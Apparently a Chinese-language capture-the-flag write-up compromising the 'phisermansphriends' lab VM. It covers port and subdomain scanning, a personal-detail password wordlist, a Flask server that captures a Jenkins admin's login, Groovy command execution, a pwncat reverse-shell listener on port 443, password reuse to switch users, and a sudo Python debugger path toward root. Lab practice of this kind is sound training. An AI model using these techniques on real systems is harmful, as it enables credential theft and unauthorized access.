❯ sudo arp-scan -l [sudo] password for Pepster: Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.60.1 00:50:56:c0:00:08 VMware, Inc. 192.168.60.2 00:50:56:e3:f6:57 VMware, Inc. 192.168.60.189 08:00:27:5a:67:6d PCS Systemtechnik GmbH 192.168.60.254 00:50:56:fd:65:82 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.031 seconds (126.05 hosts/sec). 4 responded ❯ export ip=192.168.60.189 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: Exploring the digital landscape, one IP at a time. [~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.189:22 Open 192.168.60.189:80 [~] Starting Script(s) [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 14:51 CST Initiating ARP Ping Scan at 14:51 Scanning 192.168.60.189 [1 port] Completed ARP Ping Scan at 14:51, 0.13s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 14:51 Completed Parallel DNS resolution of 1 host. at 14:51, 0.00s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 14:51 Scanning 192.168.60.189 [2 ports] Discovered open port 80/tcp on 192.168.60.189 Discovered open port 22/tcp on 192.168.60.189 Completed SYN Stealth Scan at 14:51, 0.05s elapsed (2 total ports) Nmap scan report for 192.168.60.189 Host is up, received arp-response (0.00061s latency). Scanned at 2025-02-17 14:51:07 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:5A:67:6D (Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
浏览器访问一下80端口
编辑hosts文件,添加域名
1 2
❯ sudo vim /etc/hosts 192.168.60.189 phisermansphriends.thl
扫了一下目录,只有一个index.html
1 2 3 4 5 6 7 8
❯ curl http://phisermansphriends.thl <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <body> <p>Estamos modificando la web. Contacto: [email protected] y [email protected]</> </body> </html>
❯ wfuzz -c -u "http://phisermansphriends.thl" -H "Host:FUZZ.phisermansphriends.thl" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 28 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://phisermansphriends.thl/ Total requests: 114441 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000002: 200 96 L 337 W 5367 Ch "mail" 000000058: 403 5 L 13 W 589 Ch "intranet Total time: 61.76252 Processed Requests: 114441 Filtered Requests: 114435 Requests/sec.: 1852.919
修改一下hosts
1 2
❯ sudo vim /etc/hosts 192.168.60.189 phisermansphriends.thl mail.phisermansphriends.thl intranet.phisermansphriends.thl
[+] Insert the information about the victim to make a dictionary [+] If you don't know all the info, just hit enter when asked! ;) > First Name: Mur > Surname: Rusko > Nickname: mur.rusko > Birthdate (DDMMYYYY): 20051990 > Partners) name: > Partners) nickname: > Partners) birthdate (DDMMYYYY): > Child's name: > Child's nickname: > Child's birthdate (DDMMYYYY):
> Pet's name: Rufo > Company name: PhisermansPhriends > Do you want to add some key words about the victim? Y/[N]: n > Do you want to add special chars at the end of words? Y/[N]: > Do you want to add some random numbers at the end of words? Y/[N]: > Leet mode? (i.e. leet = 1337) Y/[N]: [+] Now making a dictionary... [+] Sorting list and removing duplicates... [+] Saving dictionary to mur.txt, counting 3252 words. > Hyperspeed Print? (Y/n) : [+] Now load your pistolero with mur.txt and shoot! Good luck!
@app.route('/', methods=['POST']) defhandle_post(): # 获取表单数据 username = request.form.get('j_username') password = request.form.get('j_password') # 打印到控制台 print(f"Received POST request with j_username: {username}, j_password: {password}") returnf"Received POST request with j_username={username}&j_password={password}"
if __name__ == "__main__": app.run(host='0.0.0.0', port=80)
python运行监听端口
说实话管理员要过两分钟才会访问,不是发送后立即访问的
1 2 3 4 5 6 7 8 9 10 11
❯ python jenkins.py * Serving Flask app 'jenkins' * Debug mode: off WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead. * Running on all addresses (0.0.0.0) * Running on http://127.0.0.1:80 * Running on http://192.168.60.100:80 Press CTRL+C to quit 192.168.60.189 - - [17/Feb/2025 23:36:02] "GET / HTTP/1.1" 405 - Received POST request with j_username: admin, j_password: RqykJVKDt2RBjnR2q1zeIMYm 192.168.60.189 - - [17/Feb/2025 23:36:17] "POST / HTTP/1.1" 200 -
命令执行
拿到用户凭证后,进入Jenkins
尝试用groovy script执行命令
成功执行
用户提权
反弹shell,监听一下4444端口
不过好像并不能成功弹到shell
猜测开启了防火墙,不允许其他端口打开
尝试利用443端口
1 2 3 4 5 6 7 8 9 10 11
❯ pwncat-cs -lp 443 [00:00:14] Welcome to pwncat 🐈! __main__.py:164 [00:00:35] received connection from 192.168.60.189:40254 bind.py:84 [00:00:35] 192.168.60.189:40254: registered new host w/ db manager.py:957 (local) pwncat$ (remote) [email protected]:/var/lib/jenkins$ cat /etc/passwd|grep /bin/bash root:x:0:0:root:/root:/bin/bash mur:x:1000:1000:Mur Rusko,,,:/home/mur:/bin/bash jenkins:x:106:115:Jenkins,,,:/var/lib/jenkins:/bin/bash sysadmin:x:1001:1001:sysadmin,,,:/home/sysadmin:/bin/bash
此外我们还拿到了额外两个用户mursysadmin
我尝试利用上面得到的密码切换mur用户
这样就拿到user了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
(remote) [email protected]:/var/lib/jenkins$ su mur Contraseña: mur@TheHackersLabs-phisermansphriends:/var/lib/jenkins$ cd ~ mur@TheHackersLabs-phisermansphriends:~$ ls -al total 32 drwx------ 3 mur mur 4096 ago 30 04:54 . drwxr-xr-x 5 root root 4096 ago 30 03:50 .. lrwxrwxrwx 1 mur mur 9 ago 30 03:40 .bash_history -> /dev/null -rw-r--r-- 1 mur mur 220 ago 29 14:23 .bash_logout -rw-r--r-- 1 mur mur 3526 ago 29 14:23 .bashrc drwxr-xr-x 3 mur mur 4096 ago 30 03:55 .local -r-------- 1 mur mur 34 ago 30 04:54 .password -rw-r--r-- 1 mur mur 807 ago 29 14:23 .profile -r-------- 1 mur mur 33 ago 30 03:55 user.txt mur@TheHackersLabs-phisermansphriends:~$ cat user.txt b3991c5298d0971041e00991c5dc0cfc
Root提权
用户家目录中还有一个隐藏的密码文件
并且有sudo权限
1 2 3 4 5 6 7 8 9 10
mur@TheHackersLabs-phisermansphriends:~$ cat .password if password != 'SuperSecretPass': mur@TheHackersLabs-phisermansphriends:~$ sudo -l sudo: unable to resolve host TheHackersLabs-phisermansphriends.thl: Fallo temporal en la resolución del nombre Matching Defaults entries for mur on TheHackersLabs-phisermansphriends: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User mur may run the following commands on TheHackersLabs-phisermansphriends: (ALL) NOPASSWD: /usr/bin/python3 /opt/util.py
不过/opt/util.py只有root可读
1 2 3 4 5 6
mur@TheHackersLabs-phisermansphriends:~$ cd /opt/ mur@TheHackersLabs-phisermansphriends:/opt$ ls -al total 12 drwxr-xr-x 2 root root 4096 ago 31 12:47 . drwxr-xr-x 18 root root 4096 ago 29 14:22 .. -r-------- 1 root root 1372 ago 31 12:47 util.py
尝试运行一下,发现会开了443端口但只对本地开放
1 2 3 4
mur@TheHackersLabs-phisermansphriends:~$ sudo /usr/bin/python3 /opt/util.py sudo: unable to resolve host TheHackersLabs-phisermansphriends.thl: Fallo temporal en la resolución del nombre Escuchando en localhost:443
mur@TheHackersLabs-phisermansphriends:~$ sudo /usr/bin/python3 /opt/util.py sudo: unable to resolve host TheHackersLabs-phisermansphriends.thl: Fallo temporal en la resolución del nombre Escuchando en localhost:443 'utf-8' codec can't decode byte 0xfc in position 8: invalid start byte > /opt/util.py(18)<module>() -> if clientsock.recv(1024).strip().decode() != 'SuperSecretPass': (Pdb) --KeyboardInterrupt-- (Pdb)
